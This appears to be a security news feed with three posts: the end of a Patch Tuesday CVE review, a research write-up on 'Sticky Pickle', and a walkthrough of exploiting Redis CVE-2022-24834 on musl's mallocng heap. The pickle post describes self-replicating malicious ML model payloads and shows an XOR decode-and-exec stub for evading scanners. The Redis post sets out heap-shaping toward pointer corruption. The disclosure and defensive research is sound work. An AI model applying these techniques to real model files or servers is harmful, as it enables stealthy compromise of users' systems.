CVE-2024-30072 Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30104 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30101 Microsoft Office Remote Code Execution Vulnerability Important 7.5 No No RCE
CVE-2024-30102 Microsoft Office Remote Code Execution Vulnerability Important 7.3 No No RCE
CVE-2024-30103 Microsoft Outlook Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30100 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30097 Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30089 Microsoft Streaming Service Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30090 Microsoft Streaming Service Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2023-50868 * MITRE: CVE-2023-50868 NSEC3 closest encloser proof can exhaust CPU Important 7.5 Yes No DoS
CVE-2024-29060 Visual Studio Elevation of Privilege Vulnerability Important 6.7 No No EoP
CVE-2024-30052 Visual Studio Remote Code Execution Vulnerability Important 4.7 No No RCE
CVE-2024-30082 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30087 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30091 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30085 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30076 Windows Container Manager Service Elevation of Privilege Vulnerability Important 6.8 No No EoP
CVE-2024-30096 Windows Cryptographic Services Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-30063 Windows Distributed File System (DFS) Remote Code Execution Vulnerability Important 6.7 No No RCE
CVE-2024-30064 Windows Kernel Elevation of Privilege Vulnerability Important 8.8 No No EoP
CVE-2024-30068 Windows Kernel Elevation of Privilege Vulnerability Important 8.8 No No EoP
CVE-2024-30088 Windows Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30099 Windows Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-35250 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30084 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30074 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-30075 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-30077 Windows OLE Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-35265 Windows Perception Service Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30069 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 4.7 No No Info
CVE-2024-30094 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30095 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30083 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-30062 Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30093 Windows Storage Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2024-30065 Windows Themes Denial of Service Vulnerability Important 5.5 No No DoS
CVE-2024-30078 Windows Wi-Fi Driver Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30086 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30066 Winlogon Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-30067 WinLogon Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-5493 * Chromium: CVE-2024-5493 Heap buffer overflow in WebRTC High N/A No No RCE
CVE-2024-5494 * Chromium: CVE-2024-5494 Use after free in Dawn High N/A No No RCE
CVE-2024-5495 * Chromium: CVE-2024-5495 Use after free in Dawn High N/A No No RCE
CVE-2024-5496 * Chromium: CVE-2024-5496 Use after free in Media Session High N/A No No RCE
CVE-2024-5497 * Chromium: CVE-2024-5497 Out of bounds memory access in Keyboard Inputs High N/A No No RCE
CVE-2024-5498 * Chromium: CVE-2024-5498 Use after free in Presentation API High N/A No No RCE
CVE-2024-5499 * Chromium: CVE-2024-5499 Out of bounds write in Streams API High N/A No No RCE

* Indicates this CVE had been released by a third party and is now being included in Microsoft releases.

† Indicates further administrative actions are required to fully address the vulnerability.

 

Looking at the other fixes addressing code execution bugs, there are a couple that stand out. In addition to the Wi-Fi bug above, there are two similar bugs in the Link Layer Topology Discovery Protocol with similar exploit vectors. The difference is that for these two bugs, the target needs to be running the Network Map functionality for the attack to succeed. There are several “open-and-own” type vulnerabilities getting patched. The one to look out for would be the Office bug that states, “The Preview Pane is an attack vector, but additional user interaction is required.” It’s not clear how that would manifest. The exploit for DFS requires an adjacent attacker to already be executing code on a target, which reads more like an EoP to me. The OLE bug requires connecting to a malicious SQL server. The bug in the Speech Application Programming Interface (SAPI) requires a user to click a link to connect to the attacker’s server. Lastly, the code execution bug in Dynamics 365 requires authentication, which again sounds more like an EoP, but it also states no user interaction is required. It’s an odd write-up that implies it’s unlikely to be exploited in the wild.

More than half of this month’s release corrects privilege escalation bugs, but the majority of these lead to SYSTEM-level code execution if an authenticated user runs specially crafted code. Other privilege escalation bugs would allow the attacker to get to the level of the running application. The bugs in Winlogon are somewhat intriguing as they could allow an attacker to replace valid file content with specially crafted file content. One of the kernel bugs could be used for a container escape. The bug in the Perception Service could allow elevation to the “NT AUTHORITY\LOCAL SERVICE” account. The vulnerability in Visual Studio requires an attacker to create a malicious extension. An authenticated user would then need to create a Visual Studio project that uses that extension. If they manage all of that, it would lead to admin privileges.

The bug in Azure Identity Libraries and Microsoft Authentication Library allows attackers to read any file on the target with SYSTEM privileges. The privilege escalation in Azure Monitor Agent could let attackers delete files and folders. If you’ve disabled Automatic Extension Upgrades, you’ll need to perform a manual update to ensure the Monitor Agent is at the latest version. Speaking of extra actions, the bug in the Azure Science Virtual Machine (DSVM) requires you to upgrade your DSVM to Ubuntu 20.04. If you’re not familiar with this procedure, Microsoft provides this article for guidance. Attackers who exploit this bug could gain access to user credentials, which would allow them to impersonate authorized users.

There are only three information disclosure bugs receiving fixes this month and only one results in info leaks consisting of unspecified memory contents. The bug in the on prem version of Dynamics 365 could allow an attacker to exfiltrate all the data accessible to the logged-on user. The vulnerability in the Cryptographic Services could disclose sensitive information such as KeyGuard (KG) keys, which are intended to be per-boot and used to protect sensitive data. If an attacker could potentially use these to decrypt anything encrypted with those keys.

The final bugs for June address Denial-of-Service (DoS) vulnerabilities in Windows and Azure components. Unfortunately, Microsoft provides no additional information about these bugs and how they would manifest on affected systems. They do note the DoS in the DHCP Server does not affect those who have configured failover for their DHCP setup.

There are no new advisories in this month’s release.

Looking Ahead

The next Patch Tuesday of 2024 will be on July 9, and I’ll return with details and patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

Exploiting ML models with pickle file attacks: Part 2

11 June 2024 at 15:00

By Boyan Milanov

In part 1, we introduced Sleepy Pickle, an attack that uses malicious pickle files to stealthily compromise ML models and carry out sophisticated attacks against end users. Here we show how this technique can be adapted to enable long-lasting presence on compromised systems while remaining undetected. This variant technique, which we call Sticky Pickle, incorporates a self-replicating mechanism that propagates its malicious payload into successive versions of the compromised model. Additionally, Sticky Pickle uses obfuscation to disguise the malicious code to prevent detection by pickle file scanners.

Making malicious pickle payloads persistent

Recall from our previous blog post that Sleepy Pickle exploits rely on injecting a malicious payload into a pickle file containing a packaged ML model. This payload is executed when the pickle file is deserialized to a Python object, compromising the model’s weights and/or associated code. If the user decides to modify the compromised model (e.g., fine-tuning) and then re-distribute it, it will be serialized in a new pickle file that the attacker does not control. This process will likely render the exploit ineffective.

To overcome this limitation we developed Sticky Pickle, a self-replication mechanism that wraps our model-compromising payload in an encapsulating, persistent payload. The encapsulating payload does the following actions as it’s executed:

    1. Find the original compromised pickle file being loaded on the local filesystem.
    2. Open the file and read the encapsulating payload’s bytes from disk. (The payload cannot access them directly via its own Python code.)
    3. Hide its own bytecode in the object being unpickled under a predefined attribute name.
    4. Hook the pickle.dump() function so that when an object is re-serialized, it:
      • Serializes the object using the regular pickle.dump() function.
      • Detects that the object contains the bytecode attribute.
      • Manually injects the bytecode in the new Pickle file that was just created.

Figure 1: Persistent payload in malicious ML model files

With this technique, malicious pickle payloads automatically spread to derivative models without leaving a trace on the disk outside of the infected pickle file. Moreover, the ability to hook any function in the Python interpreter allows for other attack variations as the attacker can access other local files, such as training datasets or configuration files.

Payload obfuscation: Going under the radar

Another limitation of pickle-based exploits arises from the malicious payload being injected directly as Python source code. This means that the malicious code appears in plaintext in the Pickle file. This has several drawbacks. First, it is possible to detect the attack with naive file scanning and a few heuristics that target the presence of significant chunks of raw Python within Pickle files. Second, it’s easy for security teams to identify the attack and its intent just by looking at it.

We developed a payload obfuscation and encoding method that overcomes these limitations and makes payload detection much harder. Starting with our original payload consisting of code that compromises the pickled ML model, we modify it in two ways.

First, we obfuscate the payload by compiling it into a Python code object and serializing it into a string with the marshal library. This lets us inject this serialized payload string into the pickle file, followed by a special bytecode sequence. When executed, this special sequence calls marshal.loads() on the string to reconstruct the code object of the payload and execute it. This makes the payload completely unreadable to scanners or human inspection as it is injected as compiled Python bytecode instead of source code.

Second, we use a simple XOR encoding to vary the payload in every infected file. Instead of consisting of only the original model-compromising code, the XORed payload contains the XOR-encoded Python source of the original payload and a decoding and execution stub similar to this:

def compromise_model(model):
    # The string of the XOR-encoded python payload source code
    encoded_payload = 
    # This line decodes the payload and executes it
    exec(bytearray(b ^ 0x{XOR_KEY:X} for b in encoded_payload))
    return model

Since the obfuscation key can take any value and is hardcoded in the decoding stub, this method complements the persistence feature by allowing attackers to write a payload that generates a new obfuscation key upon reinjection in a new pickle file. This results in different Python payloads, code objects, and final pickle payloads being injected into compromised files, while the malicious behavior remains unchanged.

Figure 2: Obfuscation of the Python payload before injection in a pickle file

Figure 2 shows how this obfuscation method completely hides the malicious payload within the file. Automated tools or security analysts scanning the file would see only:

  1. The raw bytes of the Python payload that was compiled and then marshaled. It is difficult, if not impossible, to interpret these bytes and flag them as dangerous with static scanning.
  2. The pickle sequence that calls marshal.loads(). This is a common pattern also found in benign pickle files and thus is not sufficient to alert users about potential malicious behavior.

When a pickle file containing the obfuscated payload is loaded, the payload stages are executed in the following order, illustrated in figure 3:

  1. The malicious pickle opcodes load the raw bytes of the serialized code object, then reconstruct the Python code object using marshal.load(), and finally execute the code object.
  2. The code object is executed and decodes the XOR-encoded Python source code of the original payload.
  3. The decoded original payload code is executed and compromises the loaded ML model.

Figure 3: Overview of execution stages of the obfuscated payload

Sealing the lid on pickle

These persistence and evasion techniques show the level of sophistication that pickle exploits can achieve. Expanding on the critical risks we demonstrated in part one of this series, we’ve seen how a single malicious pickle file can:

  • Compromise other local pickle files and ML models.
  • Evade file scanning and make manual analysis significantly harder.
  • Make its payload polymorphic and spread it under an ever-changing form while maintaining the same final stage and end goal.

While these are only examples among other possible attack improvements, persistence and evasion are critical aspects of pickle exploits that, to our knowledge, have not yet been demonstrated.

Despite the risks posed by pickle files, we acknowledge that It will be a long-term effort for major frameworks of the ML ecosystem to move away from them. In the short-term, here are some action steps you can take to eliminate your exposure to these issues:

  • Avoid using pickle files to distribute serialized models.
  • Adopt safer alternatives to pickle files such as HuggingFace’s SafeTensors.
  • If you must use pickle files, scan them with our very own Fickling to detect pickle-based ML attacks.

Long-term, we are continuing our efforts to drive the ML industry to adopt secure-by-design technologies. If you want to learn more about our contributions, check out our awesome-ml-security and ml-file-formats Github repositories and our recent responsible disclosure of a critical GPU vulnerability called Leftover Locals!

Acknowledgments

Thanks to our intern Russel Tran for their hard work on pickle payload obfuscation and optimization.

Pumping Iron on the Musl Heap – Real World CVE-2022-24834 Exploitation on an Alpine mallocng Heap

11 June 2024 at 14:36

This post is about exploiting CVE-2022-24834 against a Redis
container running on Alpine
Linux
. CVE-2022-24834 is a vulnerability affecting the Lua cjson
module in Redis servers <=7.0.11. The bug is an integer overflow that
leads to a large copy of data, approximately 350MiB.

A colleague from NCC Group wanted to exploit this bug but found that
the public exploits didn’t work. This was ultimately due to those
exploits being written to target Ubuntu or similar distros, which use
the GNU libc library.
The target in our case was Alpine 13.8, which uses musl libc 1.2.4. The important
distinction here is that GNU libc uses the ptmalloc2 heap allocator, and
musl 1.2.4 uses its own custom allocator called mallocng. This resulted
in some interesting differences during exploitation, which I figured I
would document since there’s not a lot of public information about
targeting the musl heap.

I highly recommend reading Ricerca Security’s original writeup,
which goes into depth about the vulnerability and how they approached
exploitation on ptmalloc2. Conviso Lab’s has a README.md that
describes some improvements that they made, which is also worth a look.
There are quite a few differences between exploitation on ptmalloc2 and
mallocng, which I’ll explain as I go. I’ll try not to repeat the details
that previous research has already provided but rather focus on the
parts that differed for mallocng.

Finally, I want to note that I am not attacking the musl mallocng
allocator by corrupting its metadata, but rather I’m doing Lua-specific
exploitation on the mallocng heap, mimicking the strategy done by the
original exploit.

Lua 5.1

As the previous articles covered Lua internals in detail, I won’t
repeat that information here. Redis uses Lua 5.1, so it’s important to
refer to the specific version when reading, as Lua has undergone
significant changes across different releases. These changes include
structure layouts and the garbage collection algorithm utilized.

I would like to highlight that Lua utilizes Tagged Values to
represent various internal types such as numbers and tables. The
structure is defined as follows:

/*
** Tagged Values
*/

#define TValuefields                                                           \
    Value value;                                                               \
    int   tt

typedef struct lua_TValue {
    TValuefields;
} TValue;

In this structure, tt denotes the type, and
value can either be an inline value or a pointer depending
on the associated type. In Lua, a Table serves as the
primary storage type, akin to a dictionary or list in Python. It
contains an array of TValue structures. For simple types
like integers, value is used directly. However, for more
complex types like nested tables, value acts as a pointer.
For further implementation details, please refer to Lua’s
lobject.h file or the aforementioned articles.

During debugging, I discovered the need to inspect Lua 5.1 objects.
The Alpine redis-server target did not include symbols for
the static Lua library. To address this, I compiled my own version of
Lua and filtered out all function symbols to only access the structure
definitions easily. This was achieved by identifying and stripping out
all FUNC symbols using readelf -Ws and
objcopy --strip-symbol.

Additionally, I came across the GdbLuaExtension,
which offers pretty printers and other functionalities for analyzing Lua
objects, albeit supporting version 5.3 only. I made some minor
modifications
to enable its compatibility with Lua 5.1. These
changes enabled features like pretty printers for tables, although I
didn’t conduct exhaustive testing on the required functionalities.

This method provides a clearer analysis of objects like a
Table, presenting information in a more readable format
compared to a hexdump.

(gdb) p/x *(Table *) 0x7ffff7a05100
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffaf9ef620 <lua_table^> 0x7ffff4a76322,
  [2] = (TValue *) 0x7fffaf9ef630 <lua_table^> 0x7ffff7a051a0,
  [3] = (TValue *) 0x7fffaf9ef640 <lua_table^> 0x7ffff7a051f0,
  [4] = (TValue *) 0x7fffaf9ef650 <lua_table^> 0x7ffff7a05290,
  [5] = (TValue *) 0x7fffaf9ef660 <lua_table^> 0x7ffff7a052e0,

The Table we printed shows an array of
TValue structures, and we can see that each
TValue in our table is referencing another table.

Musl’s Next
Generation Allocator – aka mallocng

On August 4, 2020,
musl 1.2.1 shipped a new heap algorithm called “mallocng”. This
allocator has received some good quality research in the past,
predominantly focused on CTF challenge exploitation. I didn’t find any
real-world exploitation examples, but if someone knows of some, please
let me know and I’ll update the article.

The mallocng allocator is slab-based and organizes fixed-sized
allocations (called slots) on multi-page slabs (called
groups). In general, groups are mmap()-backed.
However, groups containing small slots may actually be less than a size
of a page, in which case the group is actually just a larger fixed-sized
slot on a larger group. The allocator not using brk() is an
important detail as we will see later. The fixed size for a given group
is referred to as the group’s stride.

The mallocng allocator seems to be designed with security in mind,
mixing a combination of in-band metadata that contains some cookies,
with predominantly out-of-band metadata which is stored in slots on
dedicated group mappings that are prefixed with guard pages to prevent
corruption from linear overflows.

As I’m not actually going to be exploiting the allocator internals
itself, I won’t go into too much detail about the data structures. I
advise you to read pre-existing articles, which you can find in the
resource section.

There’s a useful gdb plugin called muslheap developed by
xf1les, which I made a lot of use of. xf1les also has an associated blog
post
which is worth reading. At the time of writing, I have a PR open to add
this functionality to pwndbg, and hopefully will have time add some more
functionality to it afterwards.

There is one particularly interesting aspect of the allocator that I
want to go over, which is that it can adjust the starting offset of
slots inside a group across subsequent allocations, using a value it
calls the cycling offset. It only does so if the overhead of a given
slot inside the fixed size has a large enough remainder such that the
offset can be adjusted. Interestingly, in this case, because the slot we
are working in is the 0x50-stride group, and the Table
structure is 0x48 bytes, this cycling offset doesn’t apply. Since I
narrowly avoided having to deal with this, and originally thought I
would have to, I’ll still take a moment to explain what the mitigation
actually is for and what it looks like in practice.

mallocng Cycling Offset

The cycling offset is a technique used to mitigate double frees,
although it can have a negative effect on other exploitation scenarios
as well. It works by adjusting the offset of the user data part of an
allocation each time a chunk is used, wrapping back to the beginning
once the offset is larger than the slack space. The offset starts at 1
and increments each time the chunk is reused.

The idea behind mitigating a double free is that if a chunk is used
and then freed, and then re-used, the offset used for the second
allocation will not be the same as the first time, due to cycling. Then,
when it is double freed, that free will detect some in-band metadata
anomaly and fail.

The allocator goes about this offset cycling by abusing the fact that
groups have fixed-sized slots, and often the user data being allocated
will not fill up the entire space of the slot, resulting in some slack
space. If the remaining slack space in the slot is large enough, which
is calculated by subtracting both the size of the user data and the
required in-line metadata, then there are actually two in-line metadata
blocks used inside a slot. One contains an offset used to indicate the
actual start of the user data, and that user data will still have some
metadata prefixed before it.

The offset calculation is done in the enframe()
function in mallocng. Basically, each time a slot is allocated, the
offset is increased, and will wrap back around when it exceeds the size
of the slack.

To demonstrate what the cycling offset looks like in practice, I will
focus on larger-than-Table stride groups, that have enough
slack such that the cycling offset will be used. If we review what the
stride sizes are, we see:

sizeclass stride sizeclass stride sizeclass stride sizeclass stride
1 0x20 13 0x140 25 0xaa0 37 0x5540
2 0x30 14 0x190 26 0xcc0 38 0x6650
3 0x40 15 0x1f0 27 0xff0 39 0x7ff0
4 0x50 16 0x240 28 0x1240 40 0x9240
5 0x60 17 0x2a0 29 0x1540 41 0xaaa0
6 0x70 18 0x320 30 0x1990 42 0xccc0
7 0x80 19 0x3f0 31 0x1ff0 43 0xfff0
8 0x90 20 0x480 32 0x2480 44 0x12480
9 0xa0 21 0x540 33 0x2aa0 45 0x15540
10 0xc0 22 0x660 34 0x3320 46 0x19980
11 0xf0 23 0x7f0 35 0x3ff0 47 0x1fff0

Using a cycling offset requires an additional 4-byte in-band header
and also increases by UNIT-sized (16-byte) increments. As
such, I think it’s unlikely for strides <= 0xf0 to have the cycling
offset applied (though I haven’t tested each). There might be some
exceptions, like if sometimes smaller allocations are placed into larger
strides rather than always allocating a new group, but I’m not sure if
that’s possible as I haven’t spent enough time studying the allocator
yet.

In light of this understanding, for the sake of demonstrating when
cycling offsets are used, we’ll look at the 0x140 stride. I allocate a
few tables, fill their arrays such that the resulting sizes are ~0x100
bytes.

I use Lua to leak the address of an outer table. Then in gdb I
analyze the array of all the tables it references, which should be of
increasing size. Let’s look at the first inner table’s array first:

pwndbg> p/x *(Table *)  0x7ffff7a945b0
$2 = <lua_table> = {
  [1] = (TValue *) 0x7ffff7a99880 <lua_table^> 0x7ffff7a94740,
  [2] = (TValue *) 0x7ffff7a99890 <lua_table^> 0x7ffff7a93d80,
  [3] = (TValue *) 0x7ffff7a998a0 <lua_table^> 0x7ffff7a93e70,
  [4] = (TValue *) 0x7ffff7a998b0 <lua_table^> 0x7ffff7a95040,
  [5] = (TValue *) 0x7ffff7a998c0 <lua_table^> 0x7ffff7a950e0,
...
pwndbg> p/x ((Table *)  0x7ffff7a94740)->array
$4 = 0x7ffff7a94e40
pwndbg> mchunkinfo 0x7ffff7a94e40
============== IN-BAND META ==============
        INDEX : 2
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x29 (group --> 0x7ffff7a94ba0)

================= GROUP ================== (at 0x7ffff7a94ba0)
         meta : 0x555555a69040
   active_idx : 2

================== META ================== (at 0x555555a69040)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a94ba0
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]UU (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a94e30)
      cycling offset : 0x1 (userdata --> 0x7ffff7a94e40)
        nominal size : 0x100
       reserved size : 0x2c
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

The first chunk we see under the == SLOT == head has a
cycling offset of 1. We can see that the slot itself starts at
0x7ffff7a94e30, but the user data does not start at the same address,
but rather 0x10-bytes further. This is due to the cycling offset *
UNIT adjustment. If we quickly look at a Table
(stride 0x50) slot, which is of a size that doesn’t allow enough slack
to use a cycling offset, we can see the difference:

pwndbg> mchunkinfo 0x7ffff7a94740
============== IN-BAND META ==============
        INDEX : 11
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x37 (group --> 0x7ffff7a943c0)

================= GROUP ================== (at 0x7ffff7a943c0)
         meta : 0x555555a68ea0
   active_idx : 11

================== META ================== (at 0x555555a68ea0)
         prev : 0x555555a686f8
         next : 0x555555a68d38
          mem : 0x7ffff7a943c0
     last_idx :
   avail_mask : 0x0   (0b00000000000)
   freed_mask : 0x5ac (0b10110101100)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]FUFFUFUFFUU (from slot 11 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : Do nothing

================== SLOT ================== (at 0x7ffff7a94740)
      cycling offset : 0x0 (userdata --> 0x7ffff7a94740)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

Above, we see the SLOT section indicates a cycling
offset of 0. This will hold true for all Table allocations
in a stride 0x50 group. In this case, the user data starts at the same
location as the slot.

So now let’s look at the second stride 0x140 group’s slot that we
allocated earlier:

pwndbg> p/x ((Table *)  0x7ffff7a93d80)->array
$4 = 0x7ffff7a96ca0
pwndbg> mchunkinfo 0x7ffff7a96ca0
============== IN-BAND META ==============
        INDEX : 1
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x17 (group --> 0x7ffff7a96b20)

================= GROUP ================== (at 0x7ffff7a96b20)
         meta : 0x555555a690e0
   active_idx : 2

================== META ================== (at 0x555555a690e0)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a96b20
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: U[U]U (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a96c70)
      cycling offset : 0x3 (userdata --> 0x7ffff7a96ca0)
        nominal size : 0x100
       reserved size : 0xc
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

This second array has a cycling offset of 3, so it starts 0x30 bytes
further than the start of the slot. Clearly, this slot has been used a
few times already.

The main takeaways here are:

  • For certain allocation sizes, the exact offset of an overflow may be
    unreliable unless you know exactly how many times the slot has been
    allocated.
  • For a scenario like overwriting the LSB of a pointer inside of such
    a group, you could be unable to predict where the resulting pointer will
    point inside of another slot, depending on whether you know how many
    times each slot has been used.

Considering all this in the context of the exploit this article
describes, I think that because we have fine-grained control over all
the allocations performed for our overflow, this mitigation wouldn’t
have stopped us. Even if the structures had been on a ‘stride’ group
that uses the cycling offsets, because we can easily control the number
of times the slots are actually used prior to overflow. That said, since
I originally thought it might be a problem and wanted to understand it,
hopefully the explanation was still interesting.

With that out of the way, let’s look into how to exploit
CVE-2022-24834 on the musl heap.

Exploiting
CVE-2022-24834 on the mallocng heap

To quickly recap the vulnerability, it’s an integer overflow when
calculating the size of a buffer to allocate while doing cjson encoding.
By triggering the overflow, we end up with an undersized buffer that we
can write 0x15555555 bytes to (341 MiB), which may be large enough to
qualify as a “wild copy,” although on a 64-bit target and the amount of
memory on modern systems, it’s not too hard to deal with. Exploitation
requires that the target buffer that we want to corrupt must be adjacent
to the overflown buffer with no unmapped gaps in between, so at a
minimum around 350 MiB.

While exploiting ptmalloc2, Ricerca Security solved this problem by
extending the heap, which is brk()-based, to ensure that
enough space exists. Once the extension occurs, it won’t be shrunk
backward. This makes it easy to ensure no unmapped memory regions exist,
and that the 0x15555555-byte copy won’t hit any invalid memory.

This adjacent memory requirement poses some different problems on the
mallocng heap, which I’ll explain shortly.

After achieving the desired layout, the goal is to overwrite some
target chunk (or slot in our case) with the 0x22 value corresponding to
the ending double quote. In the Ricerca Security write-up, their
diagrams indicated they overwrote the LSB pointer of a
Table->array pointer; however, I believe their exploit
actually overwrites the LSB of a TValue->value pointer,
which exists in a chunk that is pointed to by the
Table->array. I may misunderstand their exploit, but at
any rate, the latter is the approach I used.

To summarize, the goal of the heap shaping is ultimately to ensure
that the allocation associated with a table’s array, which is pointed to
by Table->array, is adjacent to the buffer we overflow
so that we corrupt the TValue.

mallocng Heap Shaping

mallocng requires a different strategy than ptmalloc2, as it does not
use brk(). Rather, it will use mmap() to
allocate groups (below I will assume that the group itself is not a slot
of another group) and populate those groups with various fixed-size
slots. Freeing the group, which may occur if all of the slots in a group
are no longer used, results in memory backing the group to be unmapped
using munmap().

 

This means we must leverage feng shui to have valid in-use
allocations adjacent to each other at the time of the overflow. While
doing this, in order to analyze gaps in the memory space, I wrote a
small gdb utility which I’ll use to show the layout that we are working
with. A slightly modified version of this utility has also now been
added to pwndbg.

First, let’s look at what happens if we trigger the bug and allow the
copy to happen, without first shaping the heap. Note this first example
is showing the entire memory space to give an idea of what it looks
like, but in future output, I will limit what’s shown to more relevant
mappings.

The annotations added to to the mapping output are as follows:

  • ^-- ADJ: <num> indicates a series of adjacent
    memory regions, where <num> is the accumulated
    size
  • !!! GUARD PAGE indicates a series of pages with no
    permissions, which writing to would trigger a fault
  • [00....0] -- GAP: <num> indicates an unmapped
    page between mapped regions of memory, where <num> is
    the size of the gap
   0: 0x555555554000 - 0x5555555bf000    0x6b000 r--p
   2: 0x5555555bf000 - 0x555555751000   0x192000 r-xp
   3: 0x555555751000 - 0x5555557d3000    0x82000 r--p
   4: 0x5555557d3000 - 0x5555557da000     0x7000 r--p
   5: 0x5555557da000 - 0x555555833000    0x59000 rw-p
   6: 0x555555833000 - 0x555555a66000   0x233000 rw-p ^-- ADJ: 0x512000
   7: 0x555555a66000 - 0x555555a67000     0x1000 ---p !!! GUARD PAGE
   7: 0x555555a67000 - 0x555555af7000    0x90000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x2aaa2ed09000
   9: 0x7fff84800000 - 0x7fff99d84000 0x15584000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x7c000
  10: 0x7fff99e00000 - 0x7fffa48c3000  0xaac3000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xab3d000
  11: 0x7fffaf400000 - 0x7fffcf401000 0x20001000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x24348000
  12: 0x7ffff3749000 - 0x7ffff470a000   0xfc1000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0xd000
  13: 0x7ffff4717000 - 0x7ffff4c01000   0x4ea000 rw-p
      [0000000000000000000000000000000000000000000000 ]-- GAP: 0x1000
  14: 0x7ffff4c02000 - 0x7ffff4e00000   0x1fe000 rw-p
  15: 0x7ffff4e00000 - 0x7ffff5201000   0x401000 rw-p
  16: 0x7ffff5201000 - 0x7ffff5c00000   0x9ff000 rw-p
  17: 0x7ffff5c00000 - 0x7ffff5e01000   0x201000 rw-p
  18: 0x7ffff5e01000 - 0x7ffff6000000   0x1ff000 rw-p ^-- ADJ: 0x13fe000
  19: 0x7ffff6000000 - 0x7ffff6002000     0x2000 ---p !!! GUARD PAGE
  19: 0x7ffff6002000 - 0x7ffff6404000   0x402000 rw-p
  21: 0x7ffff6404000 - 0x7ffff6600000   0x1fc000 rw-p ^-- ADJ: 0x5fe000
  22: 0x7ffff6600000 - 0x7ffff6602000     0x2000 ---p !!! GUARD PAGE
  22: 0x7ffff6602000 - 0x7ffff6a04000   0x402000 rw-p
  24: 0x7ffff6a04000 - 0x7ffff6a6e000    0x6a000 rw-p
  25: 0x7ffff6a6e000 - 0x7ffff6c00000   0x192000 rw-p ^-- ADJ: 0x5fe000
  26: 0x7ffff6c00000 - 0x7ffff6c02000     0x2000 ---p !!! GUARD PAGE
  26: 0x7ffff6c02000 - 0x7ffff7004000   0x402000 rw-p
  28: 0x7ffff7004000 - 0x7ffff7062000    0x5e000 rw-p
  29: 0x7ffff7062000 - 0x7ffff715c000    0xfa000 rw-p
  30: 0x7ffff715c000 - 0x7ffff71ce000    0x72000 rw-p
  31: 0x7ffff71ce000 - 0x7ffff7200000    0x32000 rw-p
  32: 0x7ffff7200000 - 0x7ffff7a00000   0x800000 rw-p
  33: 0x7ffff7a00000 - 0x7ffff7a6f000    0x6f000 rw-p ^-- ADJ: 0xe6d000
  34: 0x7ffff7a6f000 - 0x7ffff7a71000     0x2000 ---p !!! GUARD PAGE
